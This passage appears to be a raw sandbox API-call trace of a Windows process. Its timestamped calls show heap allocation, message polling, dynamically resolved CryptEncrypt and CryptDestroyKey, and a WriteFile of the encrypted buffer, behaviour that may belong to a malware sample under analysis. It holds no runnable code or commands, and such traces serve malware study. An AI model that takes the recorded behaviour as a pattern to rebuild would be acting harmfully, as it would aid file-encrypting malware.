RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0223.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0223.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0223.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0223.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0223.278] CharLowerBuffW (in: lpsz="byte[280]", cchLength=0x9 | out: lpsz="byte[280]") returned 0x9 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0223.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b80 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0223.279] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69ac0 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e03a8 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e04c8 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.280] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.280] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.280] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.280] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.280] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0223.280] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e03a8 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0223.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69af0 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.282] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabcb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.283] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x50e0288*, pdwDataLen=0x8cef60*=0x116, dwBufLen=0x118 | out: pbData=0x50e0288*, pdwDataLen=0x8cef60*=0x118) returned 1 [0223.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.283] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.283] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.283] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.283] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.283] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.283] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.283] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.283] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.283] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.283] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.283] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.284] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.284] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.284] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.284] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.284] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.284] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.284] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.284] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.284] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.284] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.284] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.284] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.284] WriteFile (in: hFile=0x4b0, lpBuffer=0x50e0048*, nNumberOfBytesToWrite=0x118, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x50e0048*, lpNumberOfBytesWritten=0x8cf5e4*=0x118, lpOverlapped=0x0) returned 1 [0223.285] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.285] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.285] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0223.285] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.285] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0223.285] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.285] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.285] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.285] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.285] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.285] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.285] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab8d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0223.286] CryptDestroyKey (hKey=0x9e1eb8) returned 1 [0223.286] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.286] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.286] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.286] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.286] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: 